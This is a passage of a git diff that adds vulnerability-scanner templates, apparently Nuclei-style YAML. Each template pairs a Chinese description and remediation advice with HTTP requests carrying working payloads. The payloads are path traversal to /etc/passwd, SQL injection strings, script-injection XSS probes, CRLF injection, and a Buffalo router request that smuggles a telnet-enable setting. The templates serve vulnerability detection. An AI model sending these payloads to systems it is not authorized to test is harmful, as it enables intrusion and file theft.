1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: dsl + condition: and + dsl: + - contains(body,'\">') + extractors: + - name: tag + type: regex + regex: + - title="[^"]+">([^<]+) + group: 1 + part: body + internal: true + raw: + - | + GET /tag.php HTTP/1.1 + Host: {{Hostname}} + - | + GET /tag.php?tag={{tag}}&mode=1>%22> HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Boa Webserver/CVE-2017-9833.yaml b/config/51pwn/yaml/Boa Webserver/CVE-2017-9833.yaml new file mode 100755 index 000000000..5ecb8a269 --- /dev/null +++ b/config/51pwn/yaml/Boa Webserver/CVE-2017-9833.yaml @@ -0,0 +1,33 @@ +id: CVE-2017-9833 +info: + name: BOA Web Server 0.94.14 - Arbitrary File Access + author: + - l0ne1y + description: |- + Boa Webserver任意文件读取漏洞 + Boa Webserver是一款用于类Unix计算机的高性能Web服务器。 + + Boa Webserver 0.94.14rc21版本中的/cgi-bin/wapopen URI存在安全漏洞。攻击者可通过使用FILECAMERA变量注入‘../..’利用该漏洞以root权限读取文件。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.boa.org + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务。 + 4、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - root:[x*]:0:0 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0' + method: GET diff --git a/config/51pwn/yaml/Bonita BPM/CVE-2015-3897.yaml b/config/51pwn/yaml/Bonita BPM/CVE-2015-3897.yaml new file mode 100755 index 000000000..bce4685af --- /dev/null +++ b/config/51pwn/yaml/Bonita BPM/CVE-2015-3897.yaml @@ -0,0 +1,39 @@ +id: CVE-2015-3897 +info: + name: Bonita BPM 6.5.1 - Unauthenticated Directory Traversal + author: + - l0ne1y + description: |- + Bonitasoft Bonita BPM Portal 任意文件读取漏洞 + Bonitasoft Bonita BPM是美国Bonitasoft公司的一套开源的业务流程管理平台(BPM),它支持自由地创建和管理可定制的业务应用程序。Bonita BPM Portal是其中的一个门户产品。 + + Bonitasoft Bonita BPM Portal 6.5.3之前版本中存在目录遍历漏洞,该漏洞源于程序没有充分验证bonita/portal/themeResource URL的‘theme’参数和‘location’参数。远程攻击者可借助目录遍历字符‘..’和文件路径利用该漏洞写入任意文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + http://community.bonitasoft.com/blog/bonita-bpm-653-available + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务。 + 4、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - bit app support + - fonts + - extensions + - type: regex + regex: + - 'root:[x*]:0:0:' + matchers-condition: or + path: + - '{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd' + - '{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/Bookinge/Bookinge-city-sqli.yaml b/config/51pwn/yaml/Bookinge/Bookinge-city-sqli.yaml new file mode 100755 index 000000000..c068f089d --- /dev/null +++ b/config/51pwn/yaml/Bookinge/Bookinge-city-sqli.yaml @@ -0,0 +1,38 @@ +id: Bookinge-city-sqli +info: + name: Bookinge酒店预订管理系统city.getSearch模块 参数key SQL注入漏洞 + author: + - jim2g + description: |- + Bookinge酒店预订管理系统city.getSearch模块 参数key SQL注入漏洞 + Projectworlds Online Hotel Booking System是Projectworlds公司的一个酒店在线预订系统。 + + Projectworlds Online Hotel Booking System 1.0版本存在SQL注入漏洞。该漏洞源于roomname参数缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行sql注入攻击。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://projectworlds.in/free-projects/php-projects/2777-2/ + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"c4ca4238a0b923820dcc509a6f75849b") + raw: + - | + POST /?m=city.getSearch&index=xx HTTP/1.1 + Host: {{Hostname}} + + key=xxx' AND (SELECT 7359 FROM(SELECT COUNT(*),CONCAT(0x7e,(MID((IFNULL(CAST(md5(1) AS CHAR),0x20)),1,50)),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xx'='xx" + req-condition: true diff --git a/config/51pwn/yaml/Bookinge/Bookinge-info-sqli.yaml b/config/51pwn/yaml/Bookinge/Bookinge-info-sqli.yaml new file mode 100755 index 000000000..4bee9238d --- /dev/null +++ b/config/51pwn/yaml/Bookinge/Bookinge-info-sqli.yaml @@ -0,0 +1,35 @@ +id: Bookinge-info-sqli +info: + name: Bookinge酒店预订管理系统info.detail模块 参数id SQL注入漏洞 + author: + - jim2g + description: | + Bookinge酒店预订管理系统info.detail模块 参数id SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://projectworlds.in/free-projects/php-projects/2777-2/ + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"c4ca4238a0b923820dcc509a6f75849b") + raw: + - | + GET /?m=info.detail&id=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,(MID((IFNULL(CAST(md5(1)%20AS%20CHAR),0x20)),1,50)),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Bookinge/wooyun-2015-0137378-1.yaml b/config/51pwn/yaml/Bookinge/wooyun-2015-0137378-1.yaml new file mode 100755 index 000000000..3b2a30220 --- /dev/null +++ b/config/51pwn/yaml/Bookinge/wooyun-2015-0137378-1.yaml @@ -0,0 +1,35 @@ +id: wooyun-2015-0137378-1 +info: + name: Bookinge酒店预订管理系统order.orderBook 参数member_phone SQL注入漏洞 + author: + - jim2g + description: | + Bookinge酒店预订管理系统order.orderBook 参数member_phone SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"c4ca4238a0b923820dcc509a6f75849b") + raw: + - | + GET /?m=order.orderBook&member_phone=1%20%27%20AND%20(SELECT%209468%20FROM(SELECT%20COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(md5(1)%20AS%20CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20%27uNGB%27=%27uNGB HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Bookinge/wooyun-2015-0137378.yaml b/config/51pwn/yaml/Bookinge/wooyun-2015-0137378.yaml new file mode 100755 index 000000000..624f134a0 --- /dev/null +++ b/config/51pwn/yaml/Bookinge/wooyun-2015-0137378.yaml @@ -0,0 +1,35 @@ +id: wooyun-2015-0137378 +info: + name: Bookinge酒店预订管理系统login.checkAccount 参数account SQL注入漏洞 + author: + - jim2g + description: | + Bookinge酒店预订管理系统login.checkAccount 参数account SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://projectworlds.in/free-projects/php-projects/2777-2/ + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"c4ca4238a0b923820dcc509a6f75849b") + raw: + - | + GET /?m=order.orderBook&member_phone=1%20%27%20AND%20(SELECT%209468%20FROM(SELECT%20COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(md5(1)%20AS%20CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20%27uNGB%27=%27uNGB HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Buffalo WSR-2533DHPL2/CVE-2021-20090.yaml b/config/51pwn/yaml/Buffalo WSR-2533DHPL2/CVE-2021-20090.yaml new file mode 100755 index 000000000..8a22b6dcf --- /dev/null +++ b/config/51pwn/yaml/Buffalo WSR-2533DHPL2/CVE-2021-20090.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-20090 +info: + name: Buffalo WSR-2533DHPL2 - Path Traversal + author: + - gy741 + description: |- + Buffalo WSR-2533DHPL2 路径遍历漏洞 + Buffalo WSR-2533DHPL2是日本Buffalo公司的一个路由器。 + + Buffalo WSR-2533DHPL2 1.02存在路径遍历漏洞,该漏洞源于web界面处理目录遍历序列时出现输入验证错误。 + severity: critical + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.buffalo.jp/news/detail/20210427-03.html + + 临时修复方案:
1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。
2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'
3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。
1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。
2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。
3)Apache:修配置文件httpd.conf,把:Options Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。
4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。
4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + words: + - URLToken(cgi_path) + - pppoe + - wan + matchers-condition: and + raw: + - | + GET /images/..%2finfo.html HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}}/info.html diff --git a/config/51pwn/yaml/Buffalo WSR-2533DHPL2/CVE-2021-20091.yaml b/config/51pwn/yaml/Buffalo WSR-2533DHPL2/CVE-2021-20091.yaml new file mode 100755 index 000000000..1a53eabe7 --- /dev/null +++ b/config/51pwn/yaml/Buffalo WSR-2533DHPL2/CVE-2021-20091.yaml @@ -0,0 +1,44 @@ +id: CVE-2021-20091 +info: + name: Buffalo WSR-2533DHPL2 - Configuration File Injection + author: + - gy741 + - pdteam + - parth + description: "Buffalo WSR-2533DHPL2 代码执行漏洞\nBuffalo WSR-2533DHPL2是日本Buffalo公司的一个路由器。\n\nBuffalo + WSR-2533DHPL2 存在代码注入漏洞,该漏洞源于web界面的输入验证不当。以下产品及版本受到影响:WSR-2533DHPL2: 1.02 " + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.buffalo.jp/news/detail/20210427-03.html + + 临时修复方案:
1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + part: header + words: + - /Success.htm + - type: status + status: + - 302 + extractors: + - name: httoken + type: regex + regex: + - base64\,(.*?)" border= + group: 1 + internal: true + matchers-condition: and + raw: + - | + GET /images/..%2finfo.html HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}}/info.html + - | + POST /images/..%2fapply_abstract.cgi HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}}/info.html + Content-Type: application/x-www-form-urlencoded + + action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4 diff --git a/config/51pwn/yaml/Buffalo WSR-2533DHPL2/CVE-2021-20092.yaml b/config/51pwn/yaml/Buffalo WSR-2533DHPL2/CVE-2021-20092.yaml new file mode 100755 index 000000000..25de28117 --- /dev/null +++ b/config/51pwn/yaml/Buffalo WSR-2533DHPL2/CVE-2021-20092.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-20092 +info: + name: Buffalo WSR-2533DHPL2 - Improper Access Control + author: + - gy741 + - pdteam + - parth + description: |- + Buffalo WSR-2533DHPL2 信息泄露漏洞 + Buffalo WSR-2533DHPL2是日本Buffalo公司的一个路由器。 + + Buffalo WSR-2533DHPL2 存在信息泄露漏洞,该漏洞源于web界面的访问限制不当。以下产品及版本受到影响:WSR-2533DHPL2:1.02。 + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.buffalo.jp/news/detail/20210427-03.html + + 临时修复方案:
1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
2、将敏感信息进行加密存储,非必要不可发送前端
3、发送敏感信息时需加密传输,如有必要需脱敏处理
4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
令、会话标识jsessionid等), 防止敏感信息泄漏。
6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: word + part: header + words: + - application/x-javascript + - type: word + condition: and + words: + - /*DEMO*/ + - addCfg( + - type: status + status: + - 200 + extractors: + - name: httoken + type: regex + regex: + - base64\,(.*?)" border= + group: 1 + internal: true + matchers-condition: and + raw: + - | + GET /images/..%2finfo.html HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}}/info.html + - | + GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}} HTTP/1.1 + Host: {{Hostname}} + Cookie: lang=8; url=ping.html; mobile=false; + Referer: {{BaseURL}}/info.html + Content-Type: application/x-www-form-urlencoded diff --git a/config/51pwn/yaml/CGit/CVE-2018-14912.yaml b/config/51pwn/yaml/CGit/CVE-2018-14912.yaml new file mode 100755 index 000000000..0aec6c62a --- /dev/null +++ b/config/51pwn/yaml/CGit/CVE-2018-14912.yaml @@ -0,0 +1,34 @@ +id: CVE-2018-14912 +info: + name: cgit < 1.2.1 Directory Traversal + author: + - l0ne1y + description: |- + CGit 任意文件下载漏洞 + cgit是一个用C语言编写的用于git存储库的Web前端。 + + cgit 1.2.1之前版本中的cgit_clone_objects存在目录遍历漏洞。在‘cgit_clone_objects’被打开时,攻击者可通过发送特制的请求利用该漏洞检索任意文件。 + severity: high + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - root:[x*]:0:0 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/CHIYU/CVE-2021-31249.yaml b/config/51pwn/yaml/CHIYU/CVE-2021-31249.yaml new file mode 100755 index 000000000..dc91406c3 --- /dev/null +++ b/config/51pwn/yaml/CHIYU/CVE-2021-31249.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-31249 +info: + name: CHIYU TCP/IP Converter devices - CRLF injection + author: + - l0ne1y + description: |- + CHIYU CRLF导致跨站脚本漏洞 + Chiyu CHIYU BF-430等都是中国台湾七友科技(Chiyu)公司的一款为门禁、考勤系统等设备提供通讯的联网服务器。 + + CHIYU Technology Inc 的 BF-430、BF-431 和 BF-450M TCP/IP 转换器设备上存在CRLF漏洞,该可能导致跨站脚本攻击。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.chiyu-tech.com/msg/message-Firmware-update-87.html + + 临时修复方案: + 1、过滤 \r 、\n 之类的换行符,避免输入的数据污染到其他HTTP消息头。 +requests: +- matchers: + - type: status + status: + - 302 + - type: word + condition: and + part: header + words: + - 'Location: setting.htm' + - + matchers-condition: and + path: + - '{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY' + method: GET diff --git a/config/51pwn/yaml/CHIYU/CVE-2021-31250.yaml b/config/51pwn/yaml/CHIYU/CVE-2021-31250.yaml new file mode 100755 index 000000000..73e249ee4 --- /dev/null +++ b/config/51pwn/yaml/CHIYU/CVE-2021-31250.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-31250 +info: + name: CHIYU IoT XSS + author: + - l0ne1y + description: |- + CHIYU Technology BF-630W 跨站脚本漏洞 + Chiyu CHIYU BF-430等都是中国台湾七友科技(Chiyu)公司的一款为门禁、考勤系统等设备提供通讯的联网服务器。 + + CHIYU 多款产品存在跨站脚本漏洞,该漏洞源于CHIYU科技的一些物联网设备中存在未经认证的XSS漏洞,包括BF-630、BF-450M、BF-430、BF-431、BF631-W、BF830-W、Webpass、bf - min - w和SEMAC,原因是在生成HTTP 404消息时缺乏消毒。攻击者可利用该漏洞执行客户端代码。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://packetstormsecurity.com/files/cve/CVE-2021-31250 + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: dsl + dsl: + - contains(body,"") && !contains(body,"/if.cgi") + && status_code==200 + matchers-condition: and + path: + - '{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY' + method: GET + headers: + Authorization: Basic OmFkbWlu + redirects: true + req-condition: true diff --git a/config/51pwn/yaml/CLink Office/CVE-2020-6171.yaml b/config/51pwn/yaml/CLink Office/CVE-2020-6171.yaml new file mode 100755 index 000000000..117e31abb --- /dev/null +++ b/config/51pwn/yaml/CLink Office/CVE-2020-6171.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-6171 +info: + name: CLink Office v2 XSS + author: + - l0ne1y + description: |- + CLink Office 跨站脚本漏洞 + Communilink CLink Office是中国香港CommuniLink公司的一款用于统一管理电子邮件、反垃圾邮件过滤器的控制面板。 + + CommuniLink CLink Office 2.0版本中的管理控制台的索引页面存在跨站脚本漏洞。攻击者可借助‘lang’参数利用该漏洞注入任意脚本和HTML。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.communilink.net/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - '">' + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1' + method: GET diff --git a/config/51pwn/yaml/CMSEASY/CMSEASY-Flash-XSS.yaml b/config/51pwn/yaml/CMSEASY/CMSEASY-Flash-XSS.yaml new file mode 100755 index 000000000..8857cd7ce --- /dev/null +++ b/config/51pwn/yaml/CMSEASY/CMSEASY-Flash-XSS.yaml @@ -0,0 +1,28 @@ +id: CMSEASY-Flash-XSS +info: + name: CMSEASY Flash XSS漏洞 + author: + - jim2g + description: | + CMSEASY Flash 存在跨站脚本漏洞 + XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。\n反射型XSS,是最普遍的类型。用户访问服务器-跨站链接-返回跨站代码,它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。 + severity: medium + remediation: 